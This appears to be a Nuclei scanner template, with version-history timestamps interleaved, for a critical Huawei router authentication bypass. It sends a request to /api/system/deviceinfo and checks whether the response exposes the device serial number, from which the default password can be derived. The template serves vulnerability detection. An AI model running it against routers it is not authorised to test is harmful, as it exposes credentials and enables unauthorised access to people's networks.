2021-07-01 00:28:30 +00:00
id : huawei-router-auth-bypass
info :
2022-06-03 19:12:31 +00:00
name : Huawei Router - Authentication Bypass
2021-07-01 00:28:30 +00:00
author : gy741
severity : critical
2022-06-03 19:12:31 +00:00
description : Huawei Routers are vulnerable to authentication bypass because the default password of this router is the last 8 characters of the device's serial number which exist on the back of the device.
2021-08-18 11:37:49 +00:00
reference :
2021-07-01 00:28:30 +00:00
- https://www.exploit-db.com/exploits/48310
2022-06-03 19:12:31 +00:00
classification :
cvss-metrics : CVSS:10.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-288
2022-08-27 04:41:18 +00:00
tags : auth-bypass,router,edb,huawei
2021-07-01 00:28:30 +00:00
requests :
- raw :
- |
GET /api/system/deviceinfo HTTP/1.1
Host : {{Hostname}}
Accept : application/json, text/javascript, */*; q=0.01
Referer : {{BaseURL}}
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "DeviceName"
- "SerialNumber"
2021-07-06 18:02:45 +00:00
- "HardwareVersion"
2022-06-03 19:12:31 +00:00
condition : and
# Enhanced by mp on 2022/06/03